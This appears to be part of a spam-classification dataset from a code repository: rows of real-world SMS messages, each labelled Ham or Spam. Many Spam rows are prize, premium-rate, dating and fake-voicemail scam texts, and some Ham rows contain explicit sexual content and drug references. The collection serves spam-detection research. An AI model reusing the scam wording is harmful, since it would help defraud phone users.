For Euro2004 U will be kept up to date with the latest news and results daily. To be removed send GET TXT STOP to 83222 24 | Ham HIYA STU WOT U UP 2.IM IN SO MUCH TRUBLE AT HOME AT MOMENT EVONE HATES ME EVEN U! WOT THE HELL AV I DONE NOW? Y WONT U JUST TELL ME TEXT BCK PLEASE LUV DAN 25 | Ham I wanna watch that movie 26 | Ham You will be in the place of that man 27 | Ham No da. . Vijay going to talk in jaya tv 28 | Ham Whatsup there. Dont u want to sleep 29 | Ham Gud mrng dear hav a nice day 30 | Ham Yar but they say got some error. 31 | Ham Yup i thk they r e teacher said that will make my face look longer. Darren ask me not 2 cut too short. 32 | Ham Re your call; You didn't see my facebook huh? 33 | Ham You are not bothering me but you have to trust my answers. Pls. 34 | Ham Of cos can lar i'm not so ba dao ok... 1 pm lor... Y u never ask where we go ah... I said u would ask on fri but he said u will ask today... 35 | Ham Yeah, in fact he just asked if we needed anything like an hour ago. When and how much? 36 | Ham Wat r u doing? 37 | Ham Is it your yahoo boys that bring in the perf? Or legal. 38 | Ham He also knows about lunch menu only da. . I know 39 | Ham HEY DAS COOL... IKNOW ALL 2 WELLDA PERIL OF STUDENTFINANCIAL CRISIS!SPK 2 U L8R. 40 | Ham K actually can you guys meet me at the sunoco on howard? It should be right on the way 41 | Ham Nope. Meanwhile she talk say make i greet you. 42 | Ham How's it going? Got any exciting karaoke type activities planned? I'm debating whether to play football this eve. Feeling lazy though. 43 | Ham "Storming msg: Wen u lift d phne, u say ""HELLO"" Do u knw wt is d real meaning of HELLO?? . . . It's d name of a girl..! . . . Yes.. And u knw who is dat girl?? ""Margaret Hello"" She is d girlfrnd f Grah" 44 | Ham Here got ur favorite oyster... N got my favorite sashimi... Ok lar i dun say already... Wait ur stomach start rumbling... 45 | Ham Dear where you. 
Call me 46 | Spam You have an important customer service announcement. Call FREEPHONE 0800 542 0825 now! 47 | Ham I dont know oh. Hopefully this month. 48 | Ham Yeah if we do have to get a random dude we need to change our info sheets to PARTY <#> /7 NEVER STUDY just to be safe 49 | Spam Babe: U want me dont u baby! Im nasty and have a thing 4 filthyguys. Fancy a rude time with a sexy bitch. How about we go slo n hard! Txt XXX SLO(4msgs) 50 | Ham Hahaha..use your brain dear 51 | Ham I‘ll have a look at the frying pan in case it‘s cheap or a book perhaps. No that‘s silly a frying pan isn‘t likely to be a book 52 | Ham Nt only for driving even for many reasons she is called BBD..thts it chikku, then hw abt dvg cold..heard tht vinobanagar violence hw is the condition..and hw ru ? Any problem? 53 | Ham Hey sathya till now we dint meet not even a single time then how can i saw the situation sathya. 54 | Ham YO YO YO BYATCH WHASSUP? 55 | Ham Tell them u have a headache and just want to use 1 hour of sick time. 56 | Ham I told her I had a Dr appt next week. She thinks I'm gonna die. I told her its just a check. Nothing to be worried about. But she didn't listen. 57 | Ham I know dat feelin had it with Pete! Wuld get with em , nuther place nuther time mayb? 58 | Ham Don‘t give a flying monkeys wot they think and I certainly don‘t mind. Any friend of mine and all that! 59 | Ham Oh all have to come ah? 60 | Ham I want to go to perumbavoor 61 | Ham Fwiw the reason I'm only around when it's time to smoke is that because of gas I can only afford to be around when someone tells me to be and that apparently only happens when somebody wants to light 62 | Ham I calls you later. Afternoon onwords mtnl service get problem in south mumbai. I can hear you but you cann't listen me. 63 | Ham "Storming msg: Wen u lift d phne, u say ""HELLO"" Do u knw wt is d real meaning of HELLO?? . . . It's d name of a girl..! . . . Yes.. And u knw who is dat girl?? 
""Margaret Hello"" She is d girlfrnd f Grah" 64 | Ham It's ok, at least armand's still around 65 | Ham Where can download clear movies. Dvd copies. 66 | Ham I'm always looking for an excuse to be in the city. 67 | Ham Nah man, my car is meant to be crammed full of people 68 | Ham Just taste fish curry :-P 69 | Ham Pls give her prometazine syrup. 5mls then <#> mins later feed. 70 | Ham Good afternoon, babe. How goes that day ? Any job prospects yet ? I miss you, my love ... *sighs* ... :-( 71 | Ham Omg how did u know what I ate? 72 | Ham I HAVE A DATE ON SUNDAY WITH WILL!! 73 | Ham cool. We will have fun practicing making babies! 74 | Spam For ur chance to win a £250 wkly shopping spree TXT: SHOP to 80878. T's&C's www.txt-2-shop.com custcare 08715705022, 1x150p/wk 75 | Spam Camera - You are awarded a SiPix Digital Camera! call 09061221066 fromm landline. Delivery within 28 days. 76 | Ham Do u ever get a song stuck in your head for no reason and it won't go away til u listen to it like 5 times? 77 | Ham So how are you really. What are you up to. How's the masters. And so on. 78 | Ham THANX4 TODAY CER IT WAS NICE 2 CATCH UP BUT WE AVE 2 FIND MORE TIME MORE OFTEN OH WELL TAKE CARE C U SOON.C 79 | Ham Nothing. Can... 80 | Ham G wants to know where the fuck you are 81 | Ham I like dis sweater fr mango but no more my size already so irritating. 82 | Ham No b4 Thursday 83 | Ham Anything lor. Juz both of us lor. 84 | Spam Someone U know has asked our dating service 2 contact you! Cant Guess who? CALL 09058091854 NOW all will be revealed. PO BOX385 M6 6WU 85 | Ham I cant pick the phone right now. Pls send a message 86 | Ham She said,'' do u mind if I go into the bedroom for a minute ? '' ''OK'', I sed in a sexy mood. She came out 5 minuts latr wid a cake...n My Wife, 87 | Ham There is a first time for everything :) 88 | Ham * Am on a train back from northampton so i'm afraid not! 89 | Ham Hi dear we saw dear. We both are happy. 
Where you my battery is low 90 | Ham Since when, which side, any fever, any vomitin. 91 | Ham Jus finish my lunch on my way home lor... I tot u dun wan 2 stay in sch today... 92 | Ham Watching cartoon, listening music & at eve had to go temple & church.. What about u? 93 | Spam URGENT! We are trying to contact you. Last weekends draw shows that you have won a £900 prize GUARANTEED. Call 09061701939. Claim code S89. Valid 12hrs only 94 | Ham Does not operate after <#> or what 95 | Spam Buy Space Invaders 4 a chance 2 win orig Arcade Game console. Press 0 for Games Arcade (std WAP charge) See o2.co.uk/games 4 Terms + settings. No purchase 96 | Ham Why is that, princess? I bet the brothas are all chasing you! 97 | Ham What's nannys address? 98 | Ham "Two fundamentals of cool life: ""Walk, like you are the KING""...! OR ""Walk like you Dont care,whoever is the KING""!... Gud nyt" 99 | Ham Am i that much dirty fellow? 100 | Ham Were somewhere on Fredericksburg 101 | Ham Haven't seen my facebook, huh? Lol! 102 | Ham There r many model..sony ericson also der.. <#> ..it luks good bt i forgot modl no 103 | Ham I dont have i shall buy one dear 104 | Ham Sorry, I'll call later 105 | Ham I do know what u mean, is the king of not havin credit! I'm goin2bed now. Night night sweet! Only1more sleep! 106 | Ham Yes i thought so. Thanks. 107 | Ham Haha, that was the first person I was gonna ask 108 | Ham I'm going for bath will msg you next <#> min.. 109 | Ham I’m cool ta luv but v.tired 2 cause i have been doin loads of planning all wk, we have got our social services inspection at the nursery! Take care & spk sn x. 110 | Ham I thought slide is enough. 111 | Ham Your opinion about me? 1. Over 2. Jada 3. Kusruthi 4. Lovable 5. Silent 6. Spl character 7. Not matured 8. Stylish 9. Simple Pls reply.. 112 | Ham Also hi wesley how've you been 113 | Ham No sir. That's why i had an 8-hr trip on the bus last week. Have another audition next wednesday but i think i might drive this time. 
114 | Ham I meant middle left or right? 115 | Ham Yeah, where's your class at? 116 | Ham Hmm, too many of them unfortunately... Pics obviously arent hot cakes. Its kinda fun tho 117 | Spam Reply with your name and address and YOU WILL RECEIVE BY POST a weeks completely free accommodation at various global locations www.phb1.com ph:08700435505150p 118 | Ham Big brother‘s really scraped the barrel with this shower of social misfits 119 | Ham Yar... I tot u knew dis would happen long ago already. 120 | Ham Ah, well that confuses things, doesnt it? I thought was friends with now. Maybe i did the wrong thing but i already sort of invited -tho he may not come cos of money. 121 | Ham Cool, we shall go and see, have to go to tip anyway. Are you at home, got something to drop in later? So lets go to town tonight! Maybe mum can take us in. 122 | Ham Yup i thk so until e shop closes lor. 123 | Ham No shit, but I wasn't that surprised, so I went and spent the evening with that french guy I met in town here and we fooled around a bit but I didn't let him fuck me 124 | Ham Just come home. I don't want u to be miserable 125 | Ham How many licks does it take to get to the center of a tootsie pop? 126 | Spam Missed call alert. These numbers called but left no message. 07008009200 127 | Ham For you information, IKEA is spelled with all caps. That is not yelling. when you thought i had left you, you were sitting on the bed among the mess when i came in. i said we were going after you got 128 | Ham Oh ! A half hour is much longer in Syria than Canada, eh ? Wow you must get SO much more work done in a day than us with all that extra time ! *grins* 129 | Ham It shall be fine. I have avalarr now. Will hollalater 130 | Ham We are both fine. Thanks 131 | Spam Sunshine Hols. To claim ur med holiday send a stamped self address envelope to Drinks on Us UK, PO Box 113, Bray, Wicklow, Eire. Quiz Starts Saturday! 
Unsub Stop 132 | Spam Urgent UR awarded a complimentary trip to EuroDisinc Trav, Aco&Entry41 Or £1000. To claim txt DIS to 87121 18+6*£1.50(moreFrmMob. ShrAcomOrSglSuplt)10, LS1 3AJ 133 | Ham True. It is passable. And if you get a high score and apply for phd, you get 5years of salary. So it makes life easier. 134 | Spam Hi - this is your Mailbox Messaging SMS alert. You have 40 matches. Please call back on 09056242159 to retrieve your messages and matches cc100p/min 135 | Ham "Best line said in Love: . ""I will wait till the day I can forget u Or The day u realize that u cannot forget me.""... Gn" 136 | Ham Fun fact: although you would think armand would eventually build up a tolerance or some shit considering how much he smokes, he gets fucked up in like 2 hits 137 | Ham You've always been the brainy one. 138 | Ham I have a rather prominent bite mark on my right cheek 139 | Ham Home so we can always chat 140 | Ham Is there coming friday is leave for pongal?do you get any news from your work place. 141 | Ham K so am I, how much for an 8th? Fifty? 142 | Ham Dai i downloaded but there is only exe file which i can only run that exe after installing. 143 | Ham S:-)if we have one good partnership going we will take lead:) 144 | Ham And is there a way you can send shade's stuff to her. And she has been wonderful too. 145 | Spam Dont forget you can place as many FREE Requests with 1stchoice.co.uk as you wish. For more Information call 08707808226. 146 | Ham Dunno lei he neva say... 147 | Ham Hi Harish's rent has been transfred to ur Acnt. 148 | Ham Gettin rdy to ship comp 149 | Ham You will go to walmart. I.ll stay. 150 | Ham I'm still looking for a car to buy. And have not gone 4the driving test yet. 151 | Ham Fine i miss you very much. 152 | Spam RECPT 1/3. You have ordered a Ringtone. Your order is being processed... 153 | Ham Well there's still a bit left if you guys want to tonight 154 | Ham Hi. 
I'm always online on yahoo and would like to chat with you someday 155 | Ham Nope... C ü then... 156 | Ham What i mean is do they come chase you out when its over or is it stated you can watch as many movies as you want. 157 | Ham Ok... U enjoy ur shows... 158 | Ham Hello which the site to download songs its urgent pls 159 | Ham You are a great role model. You are giving so much and i really wish each day for a miracle but God as a reason for everything and i must say i wish i knew why but i dont. I've looked up to you since 160 | Ham Mmmm.... I cant wait to lick it! 161 | Ham It's wylie, you in tampa or sarasota? 162 | Ham Love has one law; Make happy the person you love. In the same way friendship has one law; Never make ur friend feel alone until you are alive.... Gud night 163 | Ham I'm really not up to it still tonight babe 164 | Ham U coming back 4 dinner rite? Dad ask me so i re confirm wif u... 165 | Ham The sign of maturity is not when we start saying big things.. But actually it is, when we start understanding small things... *HAVE A NICE EVENING* BSLVYL 166 | Spam You are being contacted by our Dating Service by someone you know! To find out who it is, call from your mobile or landline 09064017305 PoBox75LDNS7 167 | Ham How's it feel? Mr. Your not my real Valentine just my yo Valentine even tho u hardly play!! 168 | Spam No. 1 Nokia Tone 4 ur mob every week! Just txt NOK to 87021. 1st Tone FREE ! so get txtin now and tell ur friends. 150p/tone. 16 reply HL 4info 169 | Ham Howz that persons story 170 | Ham Sorry, I'll call later 171 | Ham Boooo you always work. Just quit. 172 | Ham Fyi I'm gonna call you sporadically starting at like <#> bc we are not not doin this shit 173 | Ham No problem with the renewal. I.ll do it right away but i dont know his details. 174 | Spam Free video camera phones with Half Price line rental for 12 mths and 500 cross ntwk mins 100 txts. 
Call MobileUpd8 08001950382 or Call2OptOut/674& 175 | Ham Tell my bad character which u Dnt lik in me. I'll try to change in <#> . I ll add tat 2 my new year resolution. Waiting for ur reply.Be frank...good morning. 176 | Ham I have gone into get info bt dont know what to do 177 | Ham My love ... I hope your not doing anything drastic. Don't you dare sell your pc or your phone ... 178 | Ham <#> is fast approaching. So, Wish u a very Happy New Year Happy Sankranti Happy republic day Happy Valentines Day Happy Shivratri Happy Ugadi Happy Fools day Happy May Day Happy Independence Da 179 | Ham Dear friends, sorry for the late information. Today is the birthday of our loving Ar.Praveesh. for more details log on to face book and see. Its his number + <#> . Dont miss a delicious treat. 180 | Ham Horrible gal. Me in sch doing some stuff. How come u got mc? 181 | Spam You have 1 new voicemail. Please call 08719181513. 182 | Ham No it will reach by 9 only. She telling she will be there. I dont know 183 | Ham Carlos says he'll be at mu in <#> minutes 184 | Spam SMSSERVICES. for yourinclusive text credits, pls goto www.comuk.net login= 3qxj9 unsubscribe with STOP, no extra charge. help 08702840625.COMUK. 220-CM2 9AE 185 | Ham Yes, princess. Toledo. 186 | Ham Ok ill send you with in <DECIMAL> ok. 187 | Ham I'm okay. Chasing the dream. What's good. What are you doing next. 188 | Ham Boo. How's things? I'm back at home and a little bored already :-( 189 | Ham What is important is that you prevent dehydration by giving her enough fluids 190 | Ham Am surfing online store. For offers do you want to buy any thing. 191 | Ham Buzz! Hey, my Love ! I think of you and hope your day goes well. Did you sleep in ? I miss you babe. I long for the moment we are together again*loving smile* 192 | Ham Turns out my friends are staying for the whole show and won't be back til ~ <#> , so feel free to go ahead and smoke that $ <#> worth 193 | Ham Yep. I do like the pink furniture tho. 
194 | Ham In which place do you want da. 195 | Ham Hey happy birthday... 196 | Ham Going to take your babe out ? 197 | Spam Urgent! call 09066612661 from landline. Your complementary 4* Tenerife Holiday or £10,000 cash await collection SAE T&Cs PO Box 3 WA14 2PX 150ppm 18+ Sender: Hol Offer 198 | Ham Just checking in on you. Really do miss seeing Jeremiah. Do have a great month 199 | Ham Where are you?when wil you reach here? 200 | Ham Hmmm.still we dont have opener? 201 | Spam Congrats! 2 mobile 3G Videophones R yours. call 09063458130 now! videochat wid your mates, play java games, Dload polyPH music, noline rentl. 202 | Ham Haha better late than ever, any way I could swing by? 203 | Spam Ur TONEXS subscription has been renewed and you have been charged £4.50. You can choose 10 more polys this month. www.clubzed.co.uk *BILLING MSG* 204 | Ham Another month. I need chocolate weed and alcohol. 205 | Spam How about getting in touch with folks waiting for company? Just txt back your NAME and AGE to opt in! Enjoy the community (150p/SMS) 206 | Ham Go chase after her and run her over while she's crossing the street 207 | Ham Is ur paper today in e morn or aft? 208 | Ham Lolnice. I went from a fish to ..water.? 209 | Ham Can you do online transaction? 210 | Ham Like <#> , same question 211 | Ham I got arrested for possession at, I shit you not, <TIME> pm 212 | Ham Hey gals...U all wanna meet 4 dinner at nìte? 213 | Ham Its hard to believe things like this. All can say lie but think twice before saying anything to me. 214 | Ham We not watching movie already. Xy wants 2 shop so i'm shopping w her now. 215 | Ham My exam is for february 4. Wish you a great day. 216 | Ham So do you have samus shoulders yet 217 | Ham You best watch what you say cause I get drunk as a motherfucker 218 | Ham have * good weekend. 219 | Ham Oh and by the way you do have more food in your fridge! Want to go out for a meal tonight? 
220 | Ham happened here while you were adventuring 221 | Spam http//tms. widelive.com/index. wml?id=820554ad0a1705572711&first=true¡C C Ringtone¡ 222 | Ham Greetings me, ! Consider yourself excused. 223 | Ham I wont touch you with out your permission. 224 | Ham I don't know jack shit about anything or i'd say/ask something helpful but if you want you can pretend that I did and just text me whatever in response to the hypotheticalhuagauahahuagahyuhagga 225 | Ham Oh ho. Is this the first time u use these type of words 226 | Ham One small prestige problem now. 227 | Spam Sunshine Quiz Wkly Q! Win a top Sony DVD player if u know which country Liverpool played in mid week? Txt ansr to 82277. £1.50 SP:Tyrone 228 | Ham Carlos'll be here in a minute if you still need to buy 229 | Ham Ü collecting ur laptop then going to configure da settings izzit? 230 | Ham Nice talking to you! please dont forget my pix :) i want to see all of you... 231 | Ham Its just the effect of irritation. Just ignore it 232 | Spam Sunshine Hols. To claim ur med holiday send a stamped self address envelope to Drinks on Us UK, PO Box 113, Bray, Wicklow, Eire. Quiz Starts Saturday! Unsub Stop 233 | Ham Thank you princess! You are so sexy... 234 | Ham He is world famamus.... 235 | Ham So ü'll be submitting da project tmr rite? 236 | Spam Valentines Day Special! Win over £1000 in our quiz and take your partner on the trip of a lifetime! Send GO to 83600 now. 150p/msg rcvd. CustCare:08718720201. 237 | Ham Yup... Hey then one day on fri we can ask miwa and jiayin take leave go karaoke 238 | Ham And you! Will expect you whenever you text! Hope all goes well tomo 239 | Ham Yup it's at paragon... I havent decided whether 2 cut yet... Hee... 240 | Ham "'An Amazing Quote'' - ""Sometimes in life its difficult to decide whats wrong!! a lie that brings a smile or the truth that brings a tear....""" 241 | Ham Let me know how it changes in the next 6hrs. It can even be appendix but you are out of that age range. 
However its not impossible. So just chill and let me know in 6hrs 242 | Ham Okie but i scared u say i fat... Then u dun wan me already... 243 | Spam we tried to contact you re your response to our offer of a new nokia fone and camcorder hit reply or call 08000930705 for delivery 244 | Ham Better than bb. If he wont use it, his wife will or them doctor 245 | Ham Shall i start from hear. 246 | Ham Your opinion about me? 1. Over 2. Jada 3. Kusruthi 4. Lovable 5. Silent 6. Spl character 7. Not matured 8. Stylish 9. Simple Pls reply.. 247 | Spam You have 1 new message. Please call 08718738034. 248 | Ham Idk. I'm sitting here in a stop and shop parking lot right now bawling my eyes out because i feel like i'm a failure in everything. Nobody wants me and now i feel like i'm failing you. 249 | Spam This is the 2nd time we have tried to contact u. U have won the £1450 prize to claim just call 09053750005 b4 310303. T&Cs/stop SMS 08718725756. 140ppm 250 | Ham Hey mate. Spoke to the mag people. We‘re on. the is deliver by the end of the month. Deliver on the 24th sept. Talk later. 251 | Ham Your board is working fine. The issue of overheating is also reslove. But still software inst is pending. I will come around 8'o clock. 252 | Ham It does it on its own. Most of the time it fixes my spelling. But sometimes it gets a completely diff word. Go figure 253 | Ham Wish i were with you now! 254 | Ham Your gonna have to pick up a $1 burger for yourself on your way home. I can't even move. Pain is killing me. 255 | Spam Bloomberg -Message center +447797706009 Why wait? Apply for your future http://careers. bloomberg.com 256 | Ham Is ur lecture over? 257 | Ham Dont give a monkeys wot they think and i certainly don't mind. Any friend of mine&all that! Just don't sleep wiv , that wud be annoyin! 
258 | -------------------------------------------------------------------------------- /spam_detector/spam_data/experiment_1/train_512.csv: -------------------------------------------------------------------------------- 1 | label text 2 | Ham Yeah I think my usual guy's still passed out from last night, if you get ahold of anybody let me know and I'll throw down 3 | Spam Mila, age23, blonde, new in UK. I look sex with UK guys. if u like fun with me. Text MTALK to 69866.18 . 30pp/txt 1st 5free. £1.50 increments. Help08718728876 4 | Spam Mila, age23, blonde, new in UK. I look sex with UK guys. if u like fun with me. Text MTALK to 69866.18 . 30pp/txt 1st 5free. £1.50 increments. Help08718728876 5 | Ham "And that is the problem. You walk around in ""julianaland"" oblivious to what is going on around you. I say the same things constantly and they go in one ear and out the other while you go off doing wha" 6 | Spam Urgent! Please call 09066612661 from your landline, your complimentary 4* Lux Costa Del Sol holiday or £1000 CASH await collection. ppm 150 SAE T&Cs James 28, EH74RR 7 | Spam We tried to call you re your reply to our sms for a video mobile 750 mins UNLIMITED TEXT free camcorder Reply or call now 08000930705 Del Thurs 8 | Spam Urgent! Please call 09061743811 from landline. Your ABTA complimentary 4* Tenerife Holiday or £5000 cash await collection SAE T&Cs Box 326 CW25WX 150ppm 9 | Ham The guy did some bitching but I acted like i'd be interested in buying something else next week and he gave it to us for free 10 | Spam Sorry I missed your call let's talk when you have the time. I'm on 07090201529 11 | Spam Free msg: Single? Find a partner in your area! 1000s of real people are waiting to chat now!Send CHAT to 62220Cncl send STOPCS 08717890890£1.50 per msg 12 | Ham I'm at work. Please call 13 | Ham K do I need a login or anything 14 | Spam Hi I'm sue. I am 20 years old and work as a lapdancer. I love sex. Text me live - I'm i my bedroom now. text SUE to 89555. 
By TextOperator G2 1DA 150ppmsg 18+ 15 | Ham S.s:)i thinl role is like sachin.just standing. Others have to hit. 16 | Ham Do you work all this week ? 17 | Spam Free tones Hope you enjoyed your new content. text stop to 61610 to unsubscribe. help:08712400602450p Provided by tones2you.co.uk 18 | Ham Where is that one day training:-) 19 | Ham "What part of ""don't initiate"" don't you understand" 20 | Ham alright tyler's got a minor crisis and has to be home sooner than he thought so be here asap 21 | Spam 83039 62735=£450 UK Break AccommodationVouchers terms & conditions apply. 2 claim you mustprovide your claim number which is 15541 22 | Spam I'd like to tell you my deepest darkest fantasies. Call me 09094646631 just 60p/min. To stop texts call 08712460324 (nat rate) 23 | Spam Congrats! 1 year special cinema pass for 2 is yours. call 09061209465 now! C Suprman V, Matrix3, StarWars3, etc all 4 FREE! bx420-ip4-5we. 150pm. Dont miss out! 24 | Spam Had your mobile 11 months or more? U R entitled to Update to the latest colour mobiles with camera for Free! Call The Mobile Update Co FREE on 08002986030 25 | Spam 5 Free Top Polyphonic Tones call 087018728737, National Rate. Get a toppoly tune sent every week, just text SUBPOLY to 81618, £3 per pole. UnSub 08718727870. 26 | Ham Well, I have to leave for my class babe ... You never came back to me ... :-( ... Hope you have a nice sleep, my love 27 | Spam Hi ya babe x u 4goten bout me?' scammers getting smart..Though this is a regular vodafone no, if you respond you get further prem rate msg/subscription. Other nos used also. Beware! 28 | Ham HEY BABE! FAR 2 SPUN-OUT 2 SPK AT DA MO... DEAD 2 DA WRLD. BEEN SLEEPING ON DA SOFA ALL DAY, HAD A COOL NYTHO, TX 4 FONIN HON, CALL 2MWEN IM BK FRMCLOUD 9! J X 29 | Spam **FREE MESSAGE**Thanks for using the Auction Subscription Service. 18 . 150p/MSGRCVD 2 Skip an Auction txt OUT. 2 Unsubscribe txt STOP CustomerCare 08718726270 30 | Spam For sale - arsenal dartboard. 
Good condition but no doubles or trebles! 31 | Spam URGENT! Your Mobile number has been awarded a 2000 prize GUARANTEED. Call 09061790125 from landline. Claim 3030. Valid 12hrs only 150ppm 32 | Spam Win the newest “Harry Potter and the Order of the Phoenix (Book 5) reply HARRY, answer 5 questions - chance to be the first among readers! 33 | Ham Nan sonathaya soladha. Why boss? 34 | Ham It's fine, imma get a drink or somethin. Want me to come find you? 35 | Ham Ok. 36 | Ham Erm. I thought the contract ran out the4th of october. 37 | Spam 8007 25p 4 Alfie Moon's Children in Need song on ur mob. Tell ur m8s. Txt TONE CHARITY to 8007 for nokias or POLY CHARITY for polys :zed 08701417012 profit 2 charity 38 | Spam No. 1 Nokia Tone 4 ur mob every week! Just txt NOK to 87021. 1st Tone FREE ! so get txtin now and tell ur friends. 150p/tone. 16 reply HL 4info 39 | Spam Sexy Singles are waiting for you! Text your AGE followed by your GENDER as wither M or F E.G.23F. For gay men text your AGE followed by a G. e.g.23G. 40 | Spam Gr8 Poly tones 4 ALL mobs direct 2u rply with POLY TITLE to 8007 eg POLY BREATHE1 Titles: CRAZYIN, SLEEPINGWITH, FINEST, YMCA :getzed.co.uk POBox365O4W45WQ 300p 41 | Spam For ur chance to win a £250 cash every wk TXT: ACTION to 80608. T's&C's www.movietrivia.tv custcare 08712405022, 1x150p/wk. 42 | Ham Yes.he have good crickiting mind 43 | Ham HEY MATE! HOWS U HONEY?DID U AVE GOOD HOLIDAY? GIMMI DE GOSS!x 44 | Spam Free Top ringtone -sub to weekly ringtone-get 1st week free-send SUBPOLY to 81618-?3 per week-stop sms-08718727870 45 | Ham I love your ass! Do you enjoy doggy style? :) 46 | Ham Sometimes we put walls around our hearts,not just to be safe from getting hurt.. But to find out who cares enough to break the walls & get closer.. GOODNOON:) 47 | Ham 1 in cbe. 2 in chennai. 48 | Spam PRIVATE! Your 2003 Account Statement for 07753741225 shows 800 un-redeemed S. I. M. points. 
Call 08715203677 Identifier Code: 42478 Expires 24/10/04 49 | Ham NEFT Transaction with reference number <#> for Rs. <DECIMAL> has been credited to the beneficiary account on <#> at <TIME> : <#> 50 | Spam 88066 FROM 88066 LOST 3POUND HELP 51 | Spam Well done ENGLAND! Get the official poly ringtone or colour flag on yer mobile! text TONE or FLAG to 84199 NOW! Opt-out txt ENG STOP. Box39822 W111WX £1.50 52 | Ham How long before you get reply, just defer admission til next semester 53 | Ham Hi :)finally i completed the course:) 54 | Ham I am in tirupur da, once you started from office call me. 55 | Ham Happy birthday... May u find ur prince charming soon n dun work too hard... 56 | Ham Love it! Daddy will make you scream with pleasure! I am going to slap your ass with my dick! 57 | Ham Yup no more already... Thanx 4 printing n handing it up. 58 | Spam Wanna get laid 2nite? Want real Dogging locations sent direct to ur mobile? Join the UK's largest Dogging Network. Txt PARK to 69696 now! Nyt. ec2a. 3lp £1.50/msg 59 | Ham 2 and half years i missed your friendship:-) 60 | Ham Now got tv 2 watch meh? U no work today? 61 | Ham Aiyar hard 2 type. U later free then tell me then i call n scold n tell u. 62 | Spam WIN a £200 Shopping spree every WEEK Starting NOW. 2 play text STORE to 88039. SkilGme. TsCs08714740323 1Winawk! age16 £1.50perweeksub. 63 | Spam Congratulations ur awarded either a yrs supply of CDs from Virgin Records or a Mystery Gift GUARANTEED Call 09061104283 Ts&Cs www.smsco.net £1.50pm approx 3mins 64 | Spam U have a Secret Admirer who is looking 2 make contact with U-find out who they R*reveal who thinks UR so special-call on 09065171142-stopsms-08 65 | Ham Good day to You too.Pray for me.Remove the teeth as its painful maintaining other stuff. 66 | Spam Thanks 4 your continued support Your question this week will enter u in2 our draw 4 £100 cash. Name the NEW US President? 
txt ans to 80082 67 | Spam 4mths half price Orange line rental & latest camera phones 4 FREE. Had your phone 11mths+? Call MobilesDirect free on 08000938767 to update now! or2stoptxt T&Cs 68 | Ham No one interested. May be some business plan. 69 | Ham Ya ok, then had dinner? 70 | Spam URGENT! Your mobile number *************** WON a £2000 Bonus Caller prize on 10/06/03! This is the 2nd attempt to reach you! Call 09066368753 ASAP! Box 97N7QP, 150ppm 71 | Ham Neshanth..tel me who r u? 72 | Ham Convey my regards to him 73 | Ham Idk. You keep saying that you're not, but since he moved, we keep butting heads over freedom vs. responsibility. And i'm tired. I have so much other shit to deal with that i'm barely keeping myself to 74 | Ham Sir, i am waiting for your call, once free please call me. 75 | Spam ree entry in 2 a weekly comp for a chance to win an ipod. Txt POD to 80182 to get entry (std txt rate) T&C's apply 08452810073 for details 18+ 76 | Spam Thanks for your subscription to Ringtone UK your mobile will be charged £5/month Please confirm by replying YES or NO. If you reply NO you will not be charged 77 | Ham Set a place for me in your heart and not in your mind, as the mind easily forgets but the heart will always remember. Wish you Happy Valentines Day! 78 | Ham In xam hall boy asked girl Tell me the starting term for dis answer I can den manage on my own After lot of hesitation n lookin around silently she said THE! intha ponnungale ipaditan;) 79 | Ham Hey you gave them your photo when you registered for driving ah? Tmr wanna meet at yck? 80 | Spam FREE entry into our £250 weekly comp just send the word WIN to 80086 NOW. 18 T&C www.txttowin.co.uk 81 | Ham 1) Go to write msg 2) Put on Dictionary mode 3)Cover the screen with hand, 4)Press <#> . 5)Gently remove Ur hand.. Its interesting..:) 82 | Spam Your 2004 account for 07XXXXXXXXX shows 786 unredeemed points. 
To claim call 08719181259 Identifier code: XXXXX Expires 26.03.05 83 | Spam You've won tkts to the EURO2004 CUP FINAL or £800 CASH, to collect CALL 09058099801 b4190604, POBOX 7876150ppm 84 | Ham Its not that time of the month nor mid of the time? 85 | Spam URGENT! Your Mobile number has been awarded with a £2000 prize GUARANTEED. Call 09061790126 from land line. Claim 3030. Valid 12hrs only 150ppm 86 | Spam Santa Calling! Would your little ones like a call from Santa Xmas eve? Call 09058094583 to book your time. 87 | Spam 3 FREE TAROT TEXTS! Find out about your love life now! TRY 3 FOR FREE! Text CHANCE to 85555 16 only! After 3 Free, Msgs £1.50 each 88 | Spam U were outbid by simonwatson5120 on the Shinco DVD Plyr. 2 bid again, visit sms. ac/smsrewards 2 end bid notifications, reply END OUT 89 | Spam URGENT! We are trying to contact U Todays draw shows that you have won a £800 prize GUARANTEED. Call 09050000460 from land line. Claim J89. po box245c2150pm 90 | Spam Get 3 Lions England tone, reply lionm 4 mono or lionp 4 poly. 4 more go 2 www.ringtones.co.uk, the original n best. Tones 3GBP network operator rates apply. 91 | Ham Now that you have started dont stop. Just pray for more good ideas and anything i see that can help you guys i.ll forward you a link. 92 | Spam Customer service announcement. We recently tried to make a delivery to you but were unable to do so, please call 07090298926 to re-schedule. Ref:9307622 93 | Ham Why are u up so early? 94 | Ham Exactly. Anyways how far. Is jide her to study or just visiting 95 | Ham No. I.ll meet you in the library 96 | Ham I don't run away frm u... I walk slowly & it kills me that u don't care enough to stop me... 97 | Spam You will be receiving this week's Triple Echo ringtone shortly. Enjoy it! 98 | Spam URGENT, IMPORTANT INFORMATION FOR O2 USER. TODAY IS YOUR LUCKY DAY! 2 FIND OUT WHY LOG ONTO HTTP://WWW.URAWINNER.COM THERE IS A FANTASTIC SURPRISE AWAITING FOR YOU 99 | Ham At 4. 
Let's go to bill millers 100 | Ham Solve d Case : A Man Was Found Murdered On <DECIMAL> . <#> AfterNoon. 1,His wife called Police. 2,Police questioned everyone. 3,Wife: Sir,I was sleeping, when the murder took place. 4.Co 101 | Ham Never try alone to take the weight of a tear that comes out of ur heart and falls through ur eyes... Always remember a STUPID FRIEND is here to share... BSLVYL 102 | Ham New car and house for my parents.:)i have only new job in hand:) 103 | Spam Your weekly Cool-Mob tones are ready to download !This weeks new Tones include: 1) Crazy Frog-AXEL F>>> 2) Akon-Lonely>>> 3) Black Eyed-Dont P >>>More info in n 104 | Ham If you ask her or she say any please message. 105 | Ham Sorry,in meeting I'll call later 106 | Ham I'll text carlos and let you know, hang on 107 | Ham I want to sent <#> mesages today. Thats y. Sorry if i hurts 108 | Ham Si.como no?!listened2the plaid album-quite gd&the new air1 which is hilarious-also bought”braindance”a comp.ofstuff on aphex’s ;abel,u hav2hear it!c u sn xxxx 109 | Ham 5 nights...We nt staying at port step liao...Too ex 110 | Ham Can u get pic msgs to your phone? 111 | Spam Call 09095350301 and send our girls into erotic ecstacy. Just 60p/min. To stop texts call 08712460324 (nat rate) 112 | Ham K.k.how is your business now? 113 | 